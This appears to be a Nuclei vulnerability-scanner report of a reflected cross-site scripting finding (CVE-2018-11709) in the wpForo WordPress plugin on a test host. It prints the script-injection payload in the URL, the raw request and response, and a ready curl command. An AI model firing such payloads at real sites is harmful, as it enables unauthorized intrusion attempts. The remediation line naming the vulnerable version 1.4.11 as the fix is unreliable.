WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting (CVE-2018-11709) found on honey.scanme.sh

[mkrs2404]

Details: CVE-2018-11709 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 13:42:07 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/064077b98592444f9fd28b07033ae50e

Template Information

Key	Value
Name	WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting
Authors	daffainfo
Tags	cve, cve2018, wordpress, xss, wp-plugin, gvectors
Severity	medium
Description	WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.
Remediation	Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability.
CVSS-Metrics	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-ID	CWE-79
CVE-ID	CVE-2018-11709
CVSS-Score	6.10
vendor	gvectors
product	wpforo_forum
framework	wordpress

Request

GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24033.813.2773.520/49
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 354
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:07 GMT

GET /index.php/community/?</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24033.813.2773.520/49

References:

• https://nvd.nist.gov/vuln/detail/CVE-2018-11709
• https://wordpress.org/plugins/wpforo/#developers
• https://wpvulndb.com/vulnerabilities/9090
• https://blog.dewhurstsecurity.com/2018/06/01/wp-foro-wordpress-plugin-xss-vulnerability.html
• https://github.com/ARPSyndicate/cvemon

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24033.813.2773.520/49' 'https://honey.scanme.sh/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

---

Generated by Nuclei v3.2.5